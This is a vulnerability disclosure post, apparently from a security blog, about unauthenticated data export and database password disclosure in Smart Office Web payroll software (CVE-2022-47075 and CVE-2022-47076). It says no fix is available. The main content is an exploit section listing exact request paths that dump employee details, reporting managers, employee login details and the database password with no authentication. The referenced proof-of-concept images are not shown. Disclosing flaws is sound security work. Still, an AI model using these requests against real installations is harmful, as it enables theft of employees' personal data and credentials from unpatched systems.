Smart Office Suite- Unauthenticated Data Ex

Vulnerable Software: Smart Office Web

Vulnerability: Unauthenticated Data Export and Database Password Disclosure

Affected Version: 20.28

Fixed Version: No Fix Available

Vendor Homepage: https://smartofficepayroll.com/

CVE: CVE-2022-47075 and CVE-2022-47076

CVE Author: Tejas Nitin Pingulkar

Exploit Available: POCExploit 

About Affected Software

Meant for companies with a presence in multiple locations, and usage is required at multiple places. Also suitable for those companies who would like to maintain their data at a centralized location and on their premises.

Features like Employee Self Service and Mobile are more beneficial in this setup since these can be accessed from anywhere and anytime, enabling efficiency and real-time solutions.

Benefit – Data can be centralized, management becomes easier, better control over permission and data, and Can be accessed from any time and anywhere.

Exploit

To exploit, use the following

To Export Employee Details

[IP]:[port]/ExportEmployeeDetails.aspx?ActionName=ExportEmployeeDetails

Please refer Images 1 and 2 In POC Section

To Export Reporting Manager

[IP]:[port]/ExportReportingManager.aspx

Please refer Images 3 and 4 In POC Section

To Export Employee Other Details 

[IP]:[port]/ExportEmployeeDetails.aspx?ActionName=ExportEmployeeOtherDetails

Please refer Images 5 and 6 In POC Section

To export Employee Login Details

[IP]:[port]/ExportEmployeeLoginDetails.aspx

Please refer Images 7 and 8 In POC Section

CVE-2022-47076 Database Password Disclosure

To get a database password use

[IP]:[PORT]/DisplayParallelLogData.aspx

Please refer to Image 9 In POC Section

POC:

CVE-2022-47076

 

Smart Office Suite- Unauthenticated Data Ex

2 thoughts on “Smart Office Suite- Unauthenticated Data Ex

Leave a Reply

Your email address will not be published. Required fields are marked *

Scroll to top